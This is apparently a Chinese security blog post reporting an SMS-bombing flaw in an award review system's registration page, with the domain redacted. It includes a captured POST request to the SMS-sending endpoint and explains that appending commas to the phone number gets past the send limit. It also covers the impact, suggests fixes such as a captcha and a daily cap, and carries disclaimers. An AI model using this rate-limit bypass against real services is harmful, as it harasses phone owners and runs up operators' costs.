点击蓝字 · 关注我们
逻辑漏洞
低危
某奖评审系统注册处
http://xxxxx.org.cn
0x01
奖评审系统 注册功能处:
http://xxxx.org.cn/common/login/login.jsp?returnUrl=
http://xxxx.org.cn/user/register.do?userType=2
0x02
点击获取短信,然后抓包:
正常情况下,多次发送短信会被限制:
http://xxxx.org.cn/dataservice?sb=0.36377898870876857
POST数据:
userId=0a9dc42dc8d64ba79d52e9bdc176717a&type=COMPANY_REGISTER&receiveTarget=151xxxxxxx96&CommandName=spring%3AvalidateCodeService.sendValidateCode
然后在phone=151xxxxxx096 后面每次添加逗号即可绕过限制,无限制发送短信。
1、 可以对任意手机号进行短信轰炸,大量骚扰用户,影响公司名誉。
2、 大量消耗短信接口可以对公司的经济带来一定的损失。
添加验证码,或者是限制用户一天接收短信的上限
PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负。
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
本文始发于微信公众号(EDI安全):某奖评审系统注册处存在短信炸弹
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论